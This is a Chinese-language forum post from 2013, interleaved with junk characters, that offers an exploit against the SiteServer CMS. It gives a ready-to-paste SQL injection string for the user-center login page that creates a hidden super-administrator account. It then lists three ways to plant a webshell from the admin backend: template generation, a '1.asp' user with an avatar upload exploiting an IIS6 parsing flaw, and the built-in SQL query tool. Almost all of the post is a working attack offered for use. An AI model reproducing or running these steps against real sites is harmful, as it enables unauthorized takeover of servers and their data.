经测试秒杀最新的3.5版) p5 G- `% y6 P( D
6 L: p1 u5 A' }8 W- e5 n
stieserver官网:www.siteserver.cn# N: m y: j5 X+ S! L8 ]3 {
9 I7 d4 x) b5 _
2 v, ?- F# [8 F2 C# w, h1 N
# S* Q" y; e- \# WEXP:9 W, w5 E/ C" \3 F1 X: C+ X, [
# d5 @) [" u/ d直接访问UserCenter/login.aspx* e! V8 u8 i" h& e- V4 q
, a6 q2 a1 e6 w( ]9 Q1 G& \, E3 q
% q$ L8 f4 F: G* D& s$ x
# ^/ w' f K* k" H7 @用户名处输入:/ e& T! @9 }1 L% Z8 z2 J: w
$ S. s- ?1 r) l5 Z
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
8 d: L. W$ C& n3 {( B- z+ s8 N* D
- @; o. g: s& S0 j$ C
5 v) z p3 C& i+ \% G1 `+ T& I密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
8 C$ ~# b$ X+ z, c0 T$ c
) d$ f) E, S: w2 r6 P9 ] ) \. R6 X+ y2 i
0 N V" P$ n, U! s; |
之后再访问后台SiteServer/login.aspx用插入的用户登陆# U9 o1 r0 v: X! g, D
7 S8 x5 _! s4 G2 ~( y/ P7 B 9 K3 }8 w% z4 d% d7 ]& O
, D. N0 L' z( W/ d8 `
后台拿webshell的三种方法:! Y+ }6 I7 O l
# f/ A& C X" V2 o
一、 |5 Q2 V$ T4 D# q- _9 d2 C1 L) A
: M( `' j0 Q {: I7 D站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx) n2 }' X, R% T a6 H2 y5 r
, f8 o6 r P. Q9 h* Z
二、
" S5 T; L+ ]1 Y% W2 _8 p ^1 ?8 M+ K& I! `% X
成员权限-》添加用户-》用户名为:1.asp
/ t1 c# [7 o/ r) t1 q9 {
( U6 g! r! e7 `# @& n* s4 thttp://127.0.0.1/usercenter/
3 ^$ M7 F4 X# I4 [. C) d0 Z. C$ a1 ]' v
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell; m o b5 r ^9 b
/ E& u( x- C; m( K9 @, X
(ps:后台添加用户时不会验证是否含有非法字符)5 T2 ~; r9 g8 ~3 L% ~1 d( S
( g3 S: J8 [* d* X( L: L9 F三、 G; Q/ d* G4 {5 r; u8 g: F
5 C. R3 y- q- D1 i8 `3 k* x
系统工具-》实用工具-》机器参数查看% z! K# }$ a- e2 `" p, }
可以看到数据库类型、名称,WEB路径
- [; i+ ]: x' N Y7 m' Z4 q
4 Q$ ]* K' w, t, E2 `系统工具-》数据库工具-》SQL语句查询3 U2 T5 R5 n* p9 ]: J% e
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
$ E. D7 i1 d* d
2 A5 x- N% A; A$ A |
发表于 2013-1-11 21:10:58
收藏
支持
反对